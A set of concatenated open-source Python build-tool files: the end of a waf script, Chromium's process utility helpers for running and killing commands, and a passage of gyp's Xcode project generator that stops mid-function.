for x in t:
t.extract(x)
finally:
if t:
t.close()
instdir = tempfile.mkdtemp('.inst', self.get_base_name())
ret = Utils.subprocess.Popen([sys.argv[0], 'configure', 'install', 'uninstall', '--destdir=' + instdir], cwd=self.get_base_name()).wait()
if ret:
raise Errors.WafError('distcheck failed with code %i' % ret)
if os.path.exists(instdir):
raise Errors.WafError('distcheck succeeded, but files were left in %s' % instdir)
shutil.rmtree(self.get_base_name())
def distcheck(ctx):
'''checks if the project compiles (tarball from 'dist')'''
pass
def update(ctx):
'''updates the plugins from the *waflib/extras* directory'''
lst = Options.options.files.split(',')
if not lst:
lst = [x for x in Utils.listdir(Context.waf_dir + '/waflib/extras') if x.endswith('.py')]
for x in lst:
tool = x.replace('.py', '')
try:
Configure.download_tool(tool, force=True, ctx=ctx)
except Errors.WafError:
Logs.error('Could not find the tool %s in the remote repository' % x)
def autoconfigure(execute_method):
"""
Decorator used to set the commands that can be configured automatically
"""
def execute(self):
if not Configure.autoconfig:
return execute_method(self)
env = ConfigSet.ConfigSet()
do_config = False
try:
env.load(os.path.join(Context.top_dir, Options.lockfile))
except Exception:
Logs.warn('Configuring the project')
do_config = True
else:
if env.run_dir != Context.run_dir:
do_config = True
else:
h = 0
for f in env['files']:
h = hash((h, Utils.readf(f, 'rb')))
do_config = h != env.hash
if do_config:
Options.commands.insert(0, self.cmd)
Options.commands.insert(0, 'configure')
return
return execute_method(self)
return execute
Build.BuildContext.execute = autoconfigure(Build.BuildContext.execute)
|
joone/chromium-crosswalk
|
refs/heads/2016.04.css-round-display-edtior-draft-1
|
tools/python/google/process_utils.py
|
186
|
# Copyright (c) 2006-2008 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Shared process-related utility functions."""
import errno
import os
import subprocess
import sys
class CommandNotFound(Exception): pass
TASKKILL = os.path.join(os.environ['WINDIR'], 'system32', 'taskkill.exe')
TASKKILL_PROCESS_NOT_FOUND_ERR = 128
# On windows 2000 there is no taskkill.exe, we need to have pskill somewhere
# in the path.
PSKILL = 'pskill.exe'
PSKILL_PROCESS_NOT_FOUND_ERR = -1
def KillAll(executables):
"""Tries to kill all copies of each process in the processes list. Returns
an error if any running processes couldn't be killed.
"""
result = 0
if os.path.exists(TASKKILL):
command = [TASKKILL, '/f', '/im']
process_not_found_err = TASKKILL_PROCESS_NOT_FOUND_ERR
else:
command = [PSKILL, '/t']
process_not_found_err = PSKILL_PROCESS_NOT_FOUND_ERR
for name in executables:
new_error = RunCommand(command + [name])
# Ignore "process not found" error.
if new_error != 0 and new_error != process_not_found_err:
result = new_error
return result
def RunCommandFull(command, verbose=True, collect_output=False,
print_output=True):
"""Runs the command list.
Prints the given command (which should be a list of one or more strings).
If specified, prints its stderr (and optionally stdout) to stdout,
line-buffered, converting line endings to CRLF (see note below). If
specified, collects the output as a list of lines and returns it. Waits
for the command to terminate and returns its status.
Args:
command: the full command to run, as a list of one or more strings
verbose: if True, combines all output (stdout and stderr) into stdout.
Otherwise, prints only the command's stderr to stdout.
collect_output: if True, collects the output of the command as a list of
lines and returns it
print_output: if True, prints the output of the command
Returns:
A tuple consisting of the process's exit status and output. If
collect_output is False, the output will be [].
Raises:
CommandNotFound if the command executable could not be found.
"""
print '\n' + subprocess.list2cmdline(command).replace('\\', '/') + '\n', ###
if verbose:
out = subprocess.PIPE
err = subprocess.STDOUT
else:
out = file(os.devnull, 'w')
err = subprocess.PIPE
try:
proc = subprocess.Popen(command, stdout=out, stderr=err, bufsize=1)
except OSError, e:
if e.errno == errno.ENOENT:
raise CommandNotFound('Unable to find "%s"' % command[0])
raise
output = []
if verbose:
read_from = proc.stdout
else:
read_from = proc.stderr
line = read_from.readline()
while line:
line = line.rstrip()
if collect_output:
output.append(line)
if print_output:
# Windows Python converts \n to \r\n automatically whenever it
# encounters it written to a text file (including stdout). The only
# way around it is to write to a binary file, which isn't feasible for
# stdout. So we end up with \r\n here even though we explicitly write
# \n. (We could write \r instead, which doesn't get converted to \r\n,
# but that's probably more troublesome for people trying to read the
# files.)
print line + '\n',
# Python on windows writes the buffer only when it reaches 4k. This is
# not fast enough for all purposes.
sys.stdout.flush()
line = read_from.readline()
# Make sure the process terminates.
proc.wait()
if not verbose:
out.close()
return (proc.returncode, output)
def RunCommand(command, verbose=True):
"""Runs the command list, printing its output and returning its exit status.
Prints the given command (which should be a list of one or more strings),
then runs it and prints its stderr (and optionally stdout) to stdout,
line-buffered, converting line endings to CRLF. Waits for the command to
terminate and returns its status.
Args:
command: the full command to run, as a list of one or more strings
verbose: if True, combines all output (stdout and stderr) into stdout.
Otherwise, prints only the command's stderr to stdout.
Returns:
The process's exit status.
Raises:
CommandNotFound if the command executable could not be found.
"""
return RunCommandFull(command, verbose)[0]
def RunCommandsInParallel(commands, verbose=True, collect_output=False,
print_output=True):
"""Runs a list of commands in parallel, waits for all commands to terminate
and returns their status. If specified, the ouput of commands can be
returned and/or printed.
Args:
commands: the list of commands to run, each as a list of one or more
strings.
verbose: if True, combines stdout and stderr into stdout.
Otherwise, prints only the command's stderr to stdout.
collect_output: if True, collects the output of the each command as a list
of lines and returns it.
print_output: if True, prints the output of each command.
Returns:
A list of tuples consisting of each command's exit status and output. If
collect_output is False, the output will be [].
Raises:
CommandNotFound if any of the command executables could not be found.
"""
command_num = len(commands)
outputs = [[] for i in xrange(command_num)]
procs = [None for i in xrange(command_num)]
eofs = [False for i in xrange(command_num)]
for command in commands:
print '\n' + subprocess.list2cmdline(command).replace('\\', '/') + '\n',
if verbose:
out = subprocess.PIPE
err = subprocess.STDOUT
else:
out = file(os.devnull, 'w')
err = subprocess.PIPE
for i in xrange(command_num):
try:
command = commands[i]
procs[i] = subprocess.Popen(command, stdout=out, stderr=err, bufsize=1)
except OSError, e:
if e.errno == errno.ENOENT:
raise CommandNotFound('Unable to find "%s"' % command[0])
raise
# We could consider terminating the processes already started.
# But Popen.kill() is only available in version 2.6.
# For now the clean up is done by KillAll.
while True:
eof_all = True
for i in xrange(command_num):
if eofs[i]:
continue
if verbose:
read_from = procs[i].stdout
else:
read_from = procs[i].stderr
line = read_from.readline()
if line:
eof_all = False
line = line.rstrip()
outputs[i].append(line)
if print_output:
# Windows Python converts \n to \r\n automatically whenever it
# encounters it written to a text file (including stdout). The only
# way around it is to write to a binary file, which isn't feasible
# for stdout. So we end up with \r\n here even though we explicitly
# write \n. (We could write \r instead, which doesn't get converted
# to \r\n, but that's probably more troublesome for people trying to
# read the files.)
print line + '\n',
else:
eofs[i] = True
if eof_all:
break
# Make sure the process terminates.
for i in xrange(command_num):
procs[i].wait()
if not verbose:
out.close()
return [(procs[i].returncode, outputs[i]) for i in xrange(command_num)]
|
sharaf84/digi
|
refs/heads/dev
|
shared/themes/frontend/node_modules/gulp-sass/node_modules/node-sass/node_modules/pangyp/gyp/pylib/gyp/generator/xcode.py
|
526
|
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import filecmp
import gyp.common
import gyp.xcodeproj_file
import errno
import os
import sys
import posixpath
import re
import shutil
import subprocess
import tempfile
# Project files generated by this module will use _intermediate_var as a
# custom Xcode setting whose value is a DerivedSources-like directory that's
# project-specific and configuration-specific. The normal choice,
# DERIVED_FILE_DIR, is target-specific, which is thought to be too restrictive
# as it is likely that multiple targets within a single project file will want
# to access the same set of generated files. The other option,
# PROJECT_DERIVED_FILE_DIR, is unsuitable because while it is project-specific,
# it is not configuration-specific. INTERMEDIATE_DIR is defined as
# $(PROJECT_DERIVED_FILE_DIR)/$(CONFIGURATION).
_intermediate_var = 'INTERMEDIATE_DIR'
# SHARED_INTERMEDIATE_DIR is the same, except that it is shared among all
# targets that share the same BUILT_PRODUCTS_DIR.
_shared_intermediate_var = 'SHARED_INTERMEDIATE_DIR'
_library_search_paths_var = 'LIBRARY_SEARCH_PATHS'
generator_default_variables = {
'EXECUTABLE_PREFIX': '',
'EXECUTABLE_SUFFIX': '',
'STATIC_LIB_PREFIX': 'lib',
'SHARED_LIB_PREFIX': 'lib',
'STATIC_LIB_SUFFIX': '.a',
'SHARED_LIB_SUFFIX': '.dylib',
# INTERMEDIATE_DIR is a place for targets to build up intermediate products.
# It is specific to each build environment. It is only guaranteed to exist
# and be constant within the context of a project, corresponding to a single
# input file. Some build environments may allow their intermediate directory
# to be shared on a wider scale, but this is not guaranteed.
'INTERMEDIATE_DIR': '$(%s)' % _intermediate_var,
'OS': 'mac',
'PRODUCT_DIR': '$(BUILT_PRODUCTS_DIR)',
'LIB_DIR': '$(BUILT_PRODUCTS_DIR)',
'RULE_INPUT_ROOT': '$(INPUT_FILE_BASE)',
'RULE_INPUT_EXT': '$(INPUT_FILE_SUFFIX)',
'RULE_INPUT_NAME': '$(INPUT_FILE_NAME)',
'RULE_INPUT_PATH': '$(INPUT_FILE_PATH)',
'RULE_INPUT_DIRNAME': '$(INPUT_FILE_DIRNAME)',
'SHARED_INTERMEDIATE_DIR': '$(%s)' % _shared_intermediate_var,
'CONFIGURATION_NAME': '$(CONFIGURATION)',
}
# The Xcode-specific sections that hold paths.
generator_additional_path_sections = [
'mac_bundle_resources',
'mac_framework_headers',
'mac_framework_private_headers',
# 'mac_framework_dirs', input already handles _dirs endings.
]
# The Xcode-specific keys that exist on targets and aren't moved down to
# configurations.
generator_additional_non_configuration_keys = [
'mac_bundle',
'mac_bundle_resources',
'mac_framework_headers',
'mac_framework_private_headers',
'mac_xctest_bundle',
'xcode_create_dependents_test_runner',
]
# We want to let any rules apply to files that are resources also.
generator_extra_sources_for_rules = [
'mac_bundle_resources',
'mac_framework_headers',
'mac_framework_private_headers',
]
# Xcode's standard set of library directories, which don't need to be duplicated
# in LIBRARY_SEARCH_PATHS. This list is not exhaustive, but that's okay.
xcode_standard_library_dirs = frozenset([
'$(SDKROOT)/usr/lib',
'$(SDKROOT)/usr/local/lib',
])
def CreateXCConfigurationList(configuration_names):
xccl = gyp.xcodeproj_file.XCConfigurationList({'buildConfigurations': []})
if len(configuration_names) == 0:
configuration_names = ['Default']
for configuration_name in configuration_names:
xcbc = gyp.xcodeproj_file.XCBuildConfiguration({
'name': configuration_name})
xccl.AppendProperty('buildConfigurations', xcbc)
xccl.SetProperty('defaultConfigurationName', configuration_names[0])
return xccl
class XcodeProject(object):
def __init__(self, gyp_path, path, build_file_dict):
self.gyp_path = gyp_path
self.path = path
self.project = gyp.xcodeproj_file.PBXProject(path=path)
projectDirPath = gyp.common.RelativePath(
os.path.dirname(os.path.abspath(self.gyp_path)),
os.path.dirname(path) or '.')
self.project.SetProperty('projectDirPath', projectDirPath)
self.project_file = \
gyp.xcodeproj_file.XCProjectFile({'rootObject': self.project})
self.build_file_dict = build_file_dict
# TODO(mark): add destructor that cleans up self.path if created_dir is
# True and things didn't complete successfully. Or do something even
# better with "try"?
self.created_dir = False
try:
os.makedirs(self.path)
self.created_dir = True
except OSError, e:
if e.errno != errno.EEXIST:
raise
def Finalize1(self, xcode_targets, serialize_all_tests):
# Collect a list of all of the build configuration names used by the
# various targets in the file. It is very heavily advised to keep each
# target in an entire project (even across multiple project files) using
# the same set of configuration names.
configurations = []
for xct in self.project.GetProperty('targets'):
xccl = xct.GetProperty('buildConfigurationList')
xcbcs = xccl.GetProperty('buildConfigurations')
for xcbc in xcbcs:
name = xcbc.GetProperty('name')
if name not in configurations:
configurations.append(name)
# Replace the XCConfigurationList attached to the PBXProject object with
# a new one specifying all of the configuration names used by the various
# targets.
try:
xccl = CreateXCConfigurationList(configurations)
self.project.SetProperty('buildConfigurationList', xccl)
except:
sys.stderr.write("Problem with gyp file %s\n" % self.gyp_path)
raise
# The need for this setting is explained above where _intermediate_var is
# defined. The comments below about wanting to avoid project-wide build
# settings apply here too, but this needs to be set on a project-wide basis
# so that files relative to the _intermediate_var setting can be displayed
# properly in the Xcode UI.
#
# Note that for configuration-relative files such as anything relative to
# _intermediate_var, for the purposes of UI tree view display, Xcode will
# only resolve the configuration name once, when the project file is
# opened. If the active build configuration is changed, the project file
# must be closed and reopened if it is desired for the tree view to update.
# This is filed as Apple radar 6588391.
xccl.SetBuildSetting(_intermediate_var,
'$(PROJECT_DERIVED_FILE_DIR)/$(CONFIGURATION)')
xccl.SetBuildSetting(_shared_intermediate_var,
'$(SYMROOT)/DerivedSources/$(CONFIGURATION)')
# Set user-specified project-wide build settings and config files. This
# is intended to be used very sparingly. Really, almost everything should
# go into target-specific build settings sections. The project-wide
# settings are only intended to be used in cases where Xcode attempts to
# resolve variable references in a project context as opposed to a target
# context, such as when resolving sourceTree references while building up
# the tree tree view for UI display.
# Any values set globally are applied to all configurations, then any
# per-configuration values are applied.
for xck, xcv in self.build_file_dict.get('xcode_settings', {}).iteritems():
xccl.SetBuildSetting(xck, xcv)
if 'xcode_config_file' in self.build_file_dict:
config_ref = self.project.AddOrGetFileInRootGroup(
self.build_file_dict['xcode_config_file'])
xccl.SetBaseConfiguration(config_ref)
build_file_configurations = self.build_file_dict.get('configurations', {})
if build_file_configurations:
for config_name in configurations:
build_file_configuration_named = \
build_file_configurations.get(config_name, {})
if build_file_configuration_named:
xcc = xccl.ConfigurationNamed(config_name)
for xck, xcv in build_file_configuration_named.get('xcode_settings',
{}).iteritems():
xcc.SetBuildSetting(xck, xcv)
if 'xcode_config_file' in build_file_configuration_named:
config_ref = self.project.AddOrGetFileInRootGroup(
build_file_configurations[config_name]['xcode_config_file'])
xcc.SetBaseConfiguration(config_ref)
# Sort the targets based on how they appeared in the input.
# TODO(mark): Like a lot of other things here, this assumes internal
# knowledge of PBXProject - in this case, of its "targets" property.
# ordinary_targets are ordinary targets that are already in the project
# file. run_test_targets are the targets that run unittests and should be
# used for the Run All Tests target. support_targets are the action/rule
# targets used by GYP file targets, just kept for the assert check.
ordinary_targets = []
run_test_targets = []
support_targets = []
# targets is full list of targets in the project.
targets = []
# does the it define it's own "all"?
has_custom_all = False
# targets_for_all is the list of ordinary_targets that should be listed
# in this project's "All" target. It includes each non_runtest_target
# that does not have suppress_wildcard set.
targets_for_all = []
for target in self.build_file_dict['targets']:
target_name = target['target_name']
toolset = target['toolset']
qualified_target = gyp.common.QualifiedTarget(self.gyp_path, target_name,
toolset)
xcode_target = xcode_targets[qualified_target]
# Make sure that the target being added to the sorted list is already in
# the unsorted list.
assert xcode_target in self.project._properties['targets']
targets.append(xcode_target)
ordinary_targets.append(xcode_target)
if xcode_target.support_target:
support_targets.append(xcode_target.support_target)
targets.append(xcode_target.support_target)
if not int(target.get('suppress_wildcard', False)):
targets_for_all.append(xcode_target)
if target_name.lower() == 'all':
has_custom_all = True;
# If this target has a 'run_as' attribute, add its target to the
# targets, and add it to the test targets.
if target.get('run_as'):
# Make a target to run something. It should have one
# dependency, the parent xcode target.
xccl = CreateXCConfigurationList(configurations)
run_target = gyp.xcodeproj_file.PBXAggregateTarget({
'name': 'Run ' + target_name,
'productName': xcode_target.GetProperty('productName'),
'buildConfigurationList': xccl,
},
parent=self.project)
run_target.AddDependency(xcode_target)
command = target['run_as']
script = ''
if command.get('working_directory'):
script = script + 'cd "%s"\n' % \
gyp.xcodeproj_file.ConvertVariablesToShellSyntax(
command.get('working_directory'))
if command.get('environment'):
script = script + "\n".join(
['export %s="%s"' %
(key, gyp.xcodeproj_file.ConvertVariablesToShellSyntax(val))
for (key, val) in command.get('environment').iteritems()]) + "\n"
# Some test end up using sockets, files on disk, etc. and can get
# confused if more then one test runs at a time. The generator
# flag 'xcode_serialize_all_test_runs' controls the forcing of all
# tests serially. It defaults to True. To get serial runs this
# little bit of python does the same as the linux flock utility to
# make sure only one runs at a time.
command_prefix = ''
if serialize_all_tests:
command_prefix = \
"""python -c "import fcntl, subprocess, sys
file = open('$TMPDIR/GYP_serialize_test_runs', 'a')
fcntl.flock(file.fileno(), fcntl.LOCK_EX)
sys.exit(subprocess.call(sys.argv[1:]))" """
# If we were unable to exec for some reason, we want to exit
# with an error, and fixup variable references to be shell
# syntax instead of xcode syntax.
script = script + 'exec ' + command_prefix + '%s\nexit 1\n' % \
gyp.xcodeproj_file.ConvertVariablesToShellSyntax(
gyp.common.EncodePOSIXShellList(command.get('action')))
ssbp = gyp.xcodeproj_file.PBXShellScriptBuildPhase({
'shellScript': script,
'showEnvVarsInLog': 0,
})
run_target.AppendProperty('buildPhases', ssbp)
# Add the run target to the project file.
targets.append(run_target)
run_test_targets.append(run_target)
xcode_target.test_runner = run_target
# Make sure that the list of targets being replaced is the same length as
# the one replacing it, but allow for the added test runner targets.
assert len(self.project._properties['targets']) == \
len(ordinary_targets) + len(support_targets)
self.project._properties['targets'] = targets
# Get rid of unnecessary levels of depth in groups like the Source group.
self.project.RootGroupsTakeOverOnlyChildren(True)
# Sort the groups nicely. Do this after sorting the targets, because the
# Products group is sorted based on the order of the targets.
self.project.SortGroups()
# Create an "All" target if there's more than one target in this project
# file and the project didn't define its own "All" target. Put a generated
# "All" target first so that people opening up the project for the first
# time will build everything by default.
if len(targets_for_all) > 1 and not has_custom_all:
xccl = CreateXCConfigurationList(configurations)
all_target = gyp.xcodeproj_file.PBXAggregateTarget(
{
'buildConfigurationList': xccl,
'name': 'All',
},
parent=self.project)
for target in targets_for_all:
all_target.AddDependency(target)
# TODO(mark): This is evil because it relies on internal knowledge of
# PBXProject._properties. It's important to get the "All" target first,
# though.
self.project._properties['targets'].insert(0, all_target)
# The same, but for run_test_targets.
if len(run_test_targets) > 1:
xccl = CreateXCConfigurationList(configurations)
run_all_tests_target = gyp.xcodeproj_file.PBXAggregateTarget(
{
'buildConfigurationList': xccl,
'name': 'Run All Tests',
},
parent=self.project)
for run_test_target in run_test_targets:
run_all_tests_target.AddDependency(run_test_target)
# Insert after the "All" target, which must exist if there is more than
# one run_test_target.
self.project._properties['targets'].insert(1, run_all_tests_target)
def Finalize2(self, xcode_targets, xcode_target_to_target_dict):
# Finalize2 needs to happen in a separate step because the process of
# updating references to other projects depends on the ordering of targets
# within remote project files. Finalize1 is responsible for sorting duty,
# and once all project files are sorted, Finalize2 can come in and update
# these references.
# To support making a "test runner" target that will run all the tests
# that are direct dependents of any given target, we look for
# xcode_create_dependents_test_runner being set on an Aggregate target,
# and generate a second target that will run the tests runners found under
# the marked target.
for bf_tgt in self.build_file_dict['targets']:
if int(bf_tgt.get('xcode_create_dependents_test_runner', 0)):
tgt_name = bf_tgt['target_name']
toolset = bf_tgt['toolset']
qualified_target = gyp.common.QualifiedTarget(self.gyp_path,
tgt_name, toolset)
xcode_target = xcode_targets[qualified_target]
if isinstance(xcode_target, gyp.xcodeproj_file.PBXAggregateTarget):
# Collect all the run test targets.
all_run_tests = []
pbxtds = xcode_target.GetProperty('dependencies')
for pbxtd in pbxtds:
pbxcip = pbxtd.GetProperty('targetProxy')
dependency_xct = pbxcip.GetProperty('remoteGlobalIDString')
if hasattr(dependency_xct, 'test_runner'):
all_run_tests.append(dependency_xct.test_runner)
# Directly depend on all the runners as they depend on the target
# that builds them.
if len(all_run_tests) > 0:
run_all_target = gyp.xcodeproj_file.PBXAggregateTarget({
'name': 'Run %s Tests' % tgt_name,
'productName': tgt_name,
},
parent=self.project)
for run_test_target in all_run_tests:
run_all_target.AddDependency(run_test_target)
# Insert the test runner after the related target.
idx = self.project._properties['targets'].index(xcode_target)
self.project._properties['targets'].insert(idx + 1, run_all_target)
# Update all references to other projects, to make sure that the lists of
# remote products are complete. Otherwise, Xcode will fill them in when
# it opens the project file, which will result in unnecessary diffs.
# TODO(mark): This is evil because it relies on internal knowledge of
# PBXProject._other_pbxprojects.
for other_pbxproject in self.project._other_pbxprojects.keys():
self.project.AddOrGetProjectReference(other_pbxproject)
self.project.SortRemoteProductReferences()
# Give everything an ID.
self.project_file.ComputeIDs()
# Make sure that no two objects in the project file have the same ID. If
# multiple objects wind up with the same ID, upon loading the file, Xcode
# will only recognize one object (the last one in the file?) and the
# results are unpredictable.
self.project_file.EnsureNoIDCollisions()
def Write(self):
# Write the project file to a temporary location first. Xcode watches for
# changes to the project file and presents a UI sheet offering to reload
# the project when it does change. However, in some cases, especially when
# multiple projects are open or when Xcode is busy, things don't work so
# seamlessly. Sometimes, Xcode is able to detect that a project file has
# changed but can't unload it because something else is referencing it.
# To mitigate this problem, and to avoid even having Xcode present the UI
# sheet when an open project is rewritten for inconsequential changes, the
# project file is written to a temporary file in the xcodeproj directory
# first. The new temporary file is then compared to the existing project
# file, if any. If they differ, the new file replaces the old; otherwise,
# the new project file is simply deleted. Xcode properly detects a file
# being renamed over an open project file as a change and so it remains
# able to present the "project file changed" sheet under this system.
# Writing to a temporary file first also avoids the possible problem of
# Xcode rereading an incomplete project file.
(output_fd, new_pbxproj_path) = \
tempfile.mkstemp(suffix='.tmp', prefix='project.pbxproj.gyp.',
dir=self.path)
try:
output_file = os.fdopen(output_fd, 'wb')
self.project_file.Print(output_file)
output_file.close()
pbxproj_path = os.path.join(self.path, 'project.pbxproj')
same = False
try:
same = filecmp.cmp(pbxproj_path, new_pbxproj_path, False)
except OSError, e:
if e.errno != errno.ENOENT:
raise
if same:
# The new file is identical to the old one, just get rid of the new
# one.
os.unlink(new_pbxproj_path)
else:
# The new file is different from the old one, or there is no old one.
# Rename the new file to the permanent name.
#
# tempfile.mkstemp uses an overly restrictive mode, resulting in a
# file that can only be read by the owner, regardless of the umask.
# There's no reason to not respect the umask here, which means that
# an extra hoop is required to fetch it and reset the new file's mode.
#
# No way to get the umask without setting a new one? Set a safe one
# and then set it back to the old value.
umask = os.umask(077)
os.umask(umask)
os.chmod(new_pbxproj_path, 0666 & ~umask)
os.rename(new_pbxproj_path, pbxproj_path)
except Exception:
# Don't leave turds behind. In fact, if this code was responsible for
# creating the xcodeproj directory, get rid of that too.
os.unlink(new_pbxproj_path)
if self.created_dir:
shutil.rmtree(self.path, True)
raise
def AddSourceToTarget(source, type, pbxp, xct):
# TODO(mark): Perhaps source_extensions and library_extensions can be made a
# little bit fancier.
source_extensions = ['c', 'cc', 'cpp', 'cxx', 'm', 'mm', 's']
# .o is conceptually more of a "source" than a "library," but Xcode thinks
# of "sources" as things to compile and "libraries" (or "frameworks") as
# things to link with. Adding an object file to an Xcode target's frameworks
# phase works properly.
library_extensions = ['a', 'dylib', 'framework', 'o']
basename = posixpath.basename(source)
(root, ext) = posixpath.splitext(basename)
if ext:
ext = ext[1:].lower()
if ext in source_extensions and type != 'none':
xct.SourcesPhase().AddFile(source)
elif ext in library_extensions and type != 'none':
xct.FrameworksPhase().AddFile(source)
else:
# Files that aren't added to a sources or frameworks build phase can still
# go into the project file, just not as part of a build phase.
pbxp.AddOrGetFileInRootGroup(source)
def AddResourceToTarget(resource, pbxp, xct):
# TODO(mark): Combine with AddSourceToTarget above? Or just inline this call
# where it's used.
xct.ResourcesPhase().AddFile(resource)
def AddHeaderToTarget(header, pbxp, xct, is_public):
# TODO(mark): Combine with AddSourceToTarget above? Or just inline this call
# where it's used.
settings = '{ATTRIBUTES = (%s, ); }' % ('Private', 'Public')[is_public]
xct.HeadersPhase().AddFile(header, settings)
_xcode_variable_re = re.compile('(\$\((.*?)\))')
def ExpandXcodeVariables(string, expansions):
"""Expands Xcode-style $(VARIABLES) in string per the expansions dict.
In some rare cases, it is appropriate to expand Xcode variables when a
project file is generated. For any substring $(VAR) in string, if VAR is a
key in the expansions dict, $(VAR) will be replaced with expansions[VAR].
Any $(VAR) substring in string for which VAR is not a key in the expansions
dict will remain in the returned string.
"""
matches = _xcode_variable_re.findall(string)
if matches == None:
return string
matches.reverse()
for match in matches:
(to_replace, variable) = match
if not variable in expansions:
continue
replacement = expansions[variable]
string = re.sub(re.escape(to_replace), replacement, string)
return string
_xcode_define_re = re.compile(r'([\\\"\' ])')
def EscapeXcodeDefine(s):
"""We must escape the defines that we give to XCode so that it knows not to
split on spaces and to respect backslash and quote literals. However, we
must not quote the define, or Xcode will incorrectly intepret variables
especially $(inherited)."""
return re.sub(_xcode_define_re, r'\\\1', s)
def PerformBuild(data, configurations, params):
options = params['options']
for build_file, build_file_dict in data.iteritems():
(build_file_root, build_file_ext) = os.path.splitext(build_file)
if build_file_ext != '.gyp':
continue
xcodeproj_path = build_file_root + options.suffix + '.xcodeproj'
if options.generator_output:
xcodeproj_path = os.path.join(options.generator_output, xcodeproj_path)
for config in configurations:
arguments = ['xcodebuild', '-project', xcodeproj_path]
arguments += ['-configuration', config]
print "Building [%s]: %s" % (config, arguments)
subprocess.check_call(arguments)
def GenerateOutput(target_list, target_dicts, data, params):
options = params['options']
generator_flags = params.get('generator_flags', {})
parallel_builds = generator_flags.get('xcode_parallel_builds', True)
serialize_all_tests = \
generator_flags.get('xcode_serialize_all_test_runs', True)
project_version = generator_flags.get('xcode_project_version', None)
skip_excluded_files = \
not generator_flags.get('xcode_list_excluded_files', True)
xcode_projects = {}
for build_file, build_file_dict in data.iteritems():
(build_file_root, build_file_ext) = os.path.splitext(build_file)
if build_file_ext != '.gyp':
continue
xcodeproj_path = build_file_root + options.suffix + '.xcodeproj'
if options.generator_output:
xcodeproj_path = os.path.join(options.generator_output, xcodeproj_path)
xcp = XcodeProject(build_file, xcodeproj_path, build_file_dict)
xcode_projects[build_file] = xcp
pbxp = xcp.project
if parallel_builds:
pbxp.SetProperty('attributes',
{'BuildIndependentTargetsInParallel': 'YES'})
if project_version:
xcp.project_file.SetXcodeVersion(project_version)
# Add gyp/gypi files to project
if not generator_flags.get('standalone'):
main_group = pbxp.GetProperty('mainGroup')
build_group = gyp.xcodeproj_file.PBXGroup({'name': 'Build'})
main_group.AppendChild(build_group)
for included_file in build_file_dict['included_files']:
build_group.AddOrGetFileByPath(included_file, False)
xcode_targets = {}
xcode_target_to_target_dict = {}
for qualified_target in target_list:
[build_file, target_name, toolset] = \
gyp.common.ParseQualifiedTarget(qualified_target)
spec = target_dicts[qualified_target]
if spec['toolset'] != 'target':
raise Exception(
'Multiple toolsets not supported in xcode build (target %s)' %
qualified_target)
configuration_names = [spec['default_configuration']]
for configuration_name in sorted(spec['configurations'].keys()):
if configuration_name not in configuration_names:
configuration_names.append(configuration_name)
xcp = xcode_projects[build_file]
pbxp = xcp.project
# Set up the configurations for the target according to the list of names
# supplied.
xccl = CreateXCConfigurationList(configuration_names)
# Create an XCTarget subclass object for the target. The type with
# "+bundle" appended will be used if the target has "mac_bundle" set.
# loadable_modules not in a mac_bundle are mapped to
# com.googlecode.gyp.xcode.bundle, a pseudo-type that xcode.py interprets
# to create a single-file mh_bundle.
_types = {
'executable': 'com.apple.product-type.tool',
'loadable_module': 'com.googlecode.gyp.xcode.bundle',
'shared_library': 'com.apple.product-type.library.dynamic',
'static_library': 'com.apple.product-type.library.static',
'executable+bundle': 'com.apple.product-type.application',
'loadable_module+bundle': 'com.apple.product-type.bundle',
'loadable_module+xctest': 'com.apple.product-type.bundle.unit-test',
'shared_library+bundle': 'com.apple.product-type.framework',
}
target_properties = {
'buildConfigurationList': xccl,
'name': target_name,
}
type = spec['type']
is_xctest = int(spec.get('mac_xctest_bundle', 0))
is_bundle = int(spec.get('mac_bundle', 0)) or is_xctest
if type != 'none':
type_bundle_key = type
if is_xctest:
type_bundle_key += '+xctest'
assert type == 'loadable_module', (
'mac_xctest_bundle targets must have type loadable_module '
'(target %s)' % target_name)
elif is_bundle:
type_bundle_key += '+bundle'
xctarget_type = gyp.xcodeproj_file.PBXNativeTarget
try:
target_properties['productType'] = _types[type_bundle_key]
except KeyError, e:
gyp.common.ExceptionAppend(e, "-- unknown product type while "
"writing target %s" % target_name)
raise
else:
xctarget_type = gyp.xcodeproj_file.PBXAggregateTarget
assert not is_bundle, (
'mac_bundle targets cannot have type none (target "%s")' %
target_name)
assert not is_xctest, (
'mac_xctest_bundle targets cannot have type none (target "%s")' %
target_name)
target_product_name = spec.get('product_name')
if target_product_name is not None:
target_properties['productName'] = target_product_name
xct = xctarget_type(target_properties, parent=pbxp,
force_outdir=spec.get('product_dir'),
force_prefix=spec.get('product_prefix'),
force_extension=spec.get('product_extension'))
pbxp.AppendProperty('targets', xct)
xcode_targets[qualified_target] = xct
xcode_target_to_target_dict[xct] = spec
spec_actions = spec.get('actions', [])
spec_rules = spec.get('rules', [])
# Xcode has some "issues" with checking dependencies for the "Compile
# sources" step with any source files/headers generated by actions/rules.
# To work around this, if a target is building anything directly (not
# type "none"), then a second target is used to run the GYP actions/rules
# and is made a dependency of this target. This way the work is done
# before the dependency checks for what should be recompiled.
support_xct = None
if type != 'none' and (spec_actions or spec_rules):
support_xccl = CreateXCConfigurationList(configuration_names);
support_target_properties = {
'buildConfigurationList': support_xccl,
'name': target_name + ' Support',
}
if target_product_name:
support_target_properties['productName'] = \
target_product_name + ' Support'
support_xct = \
gyp.xcodeproj_file.PBXAggregateTarget(support_target_properties,
parent=pbxp)
pbxp.AppendProperty('targets', support_xct)
xct.AddDependency(support_xct)
# Hang the support target off the main target so it can be tested/found
# by the generator during Finalize.
xct.support_target = support_xct
prebuild_index = 0
# Add custom shell script phases for "actions" sections.
for action in spec_actions:
# There's no need to write anything into the script to ensure that the
# output directories already exist, because Xcode will look at the
# declared outputs and automatically ensure that they exist for us.
# Do we have a message to print when this action runs?
message = action.get('message')
if message:
message = 'echo note: ' + gyp.common.EncodePOSIXShellArgument(message)
else:
message = ''
# Turn the list into a string that can be passed to a shell.
action_string = gyp.common.EncodePOSIXShellList(action['action'])
# Convert Xcode-type variable references to sh-compatible environment
# variable references.
message_sh = gyp.xcodeproj_file.ConvertVariablesToShellSyntax(message)
action_string_sh = gyp.xcodeproj_file.ConvertVariablesToShellSyntax(
action_string)
script = ''
# Include the optional message
if message_sh:
script += message_sh + '\n'
# Be sure the script runs in exec, and that if exec fails, the script
# exits signalling an error.
script += 'exec ' + action_string_sh + '\nexit 1\n'
